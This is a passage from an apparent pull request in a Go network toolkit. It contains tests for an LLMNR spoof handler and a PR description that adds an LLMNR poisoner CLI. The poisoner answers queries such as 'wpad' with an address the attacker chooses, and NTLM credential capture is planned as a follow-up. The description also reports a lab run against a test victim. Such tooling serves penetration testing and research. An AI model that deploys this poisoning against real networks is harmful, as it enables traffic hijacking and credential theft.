+	}
+
+	remote := &net.UDPAddr{IP: net.ParseIP("10.7.0.20"), Port: 54321}
+
+	// Matched query: Run answers and returns false (stop the chain).
+	w := &captureWriter{remote: remote}
+	if cont := h.Run(nil, remote, w, newQuery(t, "wpad", llmnr_type.TypeA)); cont {
+		t.Error("Run should return false after answering a matched query")
+	}
+	if w.written == nil {
+		t.Fatal("Run did not write a response for a matched query")
+	}
+	if !w.written.IsResponse() || len(w.written.Answers) != 1 {
+		t.Errorf("written response malformed: QR=%v answers=%d", w.written.IsResponse(), len(w.written.Answers))
+	}
+
+	// Unmatched query: Run writes nothing and returns true (continue the chain).
+	w2 := &captureWriter{remote: remote}
+	if cont := h.Run(nil, remote, w2, newQuery(t, "notlisted", llmnr_type.TypeA)); !cont {
+		t.Error("Run should return true when no name matched")
+	}
+	if w2.written != nil {
+		t.Error("Run should not write a response for an unmatched query")
+	}
+}
+
+// TestNewSpoofHandlerValidation verifies the constructor rejects unusable
+// configurations.
+func TestNewSpoofHandlerValidation(t *testing.T) {
+	cases := []struct {
+		name string
+		cfg  server.SpoofConfig
+	}{
+		{"no-address-family", server.SpoofConfig{Mode: server.MatchAll}},
+		{"list-without-names", server.SpoofConfig{Mode: server.MatchList, AnswerA: true, SpoofIPv4: net.ParseIP("10.0.0.1")}},
+		{"regex-without-regex", server.SpoofConfig{Mode: server.MatchRegex, AnswerA: true, SpoofIPv4: net.ParseIP("10.0.0.1")}},
+		{"answerA-without-ip", server.SpoofConfig{Mode: server.MatchAll, AnswerA: true}},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			if _, err := server.NewSpoofHandler(tc.cfg); err == nil {
+				t.Errorf("expected an error for config %q", tc.name)
+			}
+		})
+	}
+}


### PR DESCRIPTION
### Linked Issue
`Closes #944`

### Summary
Adds the first offensive capability to the LLMNR server: a configurable spoof/poison handler that answers matched query names with an attacker-chosen or auto-detected local address, plus an operator-facing CLI entrypoint to run an LLMNR poisoner. NTLM-capture glue remains out of scope (separate follow-up).

### What changed
- **`network/llmnr/server/spoof_handler.go`** — `SpoofHandler` / `SpoofConfig` implementing the `Handler` interface:
  - Name matching by `MatchAll` (answer every name), `MatchList` (case-insensitive exact allowlist), or `MatchRegex`.
  - Answers A and/or AAAA with a configured `SpoofIPv4`/`SpoofIPv6`.
  - `SuppressOwnHostname` declines to answer the host's own single-label name so the poisoner does not shadow legitimate resolution of itself.
  - Response construction reuses `message.CreateResponseFromMessage` + `AddAnswerClassINTypeA/AAAA`: copies the query transaction ID, sets the QR (response) flag, echoes the question section, and carries an answer RR with a sane TTL (RFC 4795 §2.8 default of 30). The existing `ResponseWriter` unicasts it back to the querying host's source port (RFC 4795 §2.3).
  - `NewSpoofHandler` validates the configuration (answerable address family present, allowlist/regex supplied for the selected mode) so a misconfigured poisoner fails fast.
- **`network/llmnr/server/local_address.go`** — `InterfaceAddresses` auto-detects the IPv4/IPv6 unicast address to hand out from a named (or first non-loopback) interface.
- **`network/llmnr/server/server.go`** — new optional `Server.Interface` used for the multicast group join so the responder can bind a specific link on multi-homed hosts (nil preserves prior behavior), plus a mutex-synchronized `Listening()` accessor.
- **`cmd/poisoner/main.go`** — minimal CLI following the repo's `goopts` house style: interface selection, spoof IPv4/IPv6 (default auto-detect), name filter (all / `--name` list / `--regex`), `--no-ipv4`/`--no-ipv6`, verbosity. Runs the IPv4 and IPv6 responders concurrently. Structured so NBT-NS (`network/netbios/nbns/`) and credential capture can be added later without reshaping the command.

### How Verified
- `go build ./...`, `go vet ./network/llmnr/... ./cmd/...`, and `go test ./network/llmnr/... -race -count=1` all pass.
- **Unit tests** (`spoof_handler_test.go`) assert response wire-correctness (QR bit set, ID copied, question echoed, single A/AAAA answer with the configured spoof IP and TTL, marshal/unmarshal round-trip) and every match mode (all / allowlist / regex / own-hostname suppression / type gating / constructor validation / `Run` chain behavior).
- **Live end-to-end validation on the real multicast path (lab interface `enp0s8`, 10.7.0.8/24):** ran the poisoner answering a non-existent name and used this project's own RFC-4795-validating LLMNR resolver (`Client.ResolveA`, multicast egress forced to `enp0s8`) as the victim. The victim received the spoofed address — verified both against the programmatic handler (`totally-fake-name -> 10.7.0.66`) and against the compiled `cmd/poisoner` binary (`wpad -> 10.7.0.77`). Because the resolver validates the response's question echo and source before accepting it (#957), this proves the spoofed answer is wire-correct and accepted by a real resolver.

### Test Coverage
- **Added:** `TestSpoofHandlerAnswerWireCorrectnessA`, `TestSpoofHandlerAnswerWireCorrectnessAAAA`, `TestSpoofHandlerMatchModes`, `TestSpoofHandlerTypeGating`, `TestSpoofHandlerRun`, `TestNewSpoofHandlerValidation`.

### Scope of Change
- **Files changed:** `cmd/poisoner/main.go`, `network/llmnr/server/{spoof_handler.go,local_address.go,server.go,server_test.go,spoof_handler_test.go}`.
- **Submodule pointer updated:** no.
- **Behavioral changes outside the feature:** the `Server.Interface` field and `Listening()` accessor are additive; the two existing server start/stop tests now observe startup via `Listening()` instead of racing on the public `Conn` field, which makes the required `-race` run green.

### Notes
The Windows-victim bonus (inducing 10.7.0.10 to emit an organic LLMNR query) was not demonstrated: a 12s passive observation on the segment saw no organic LLMNR query and there was no shell on the host to induce one. The primary self-resolver end-to-end test is sufficient proof of correctness.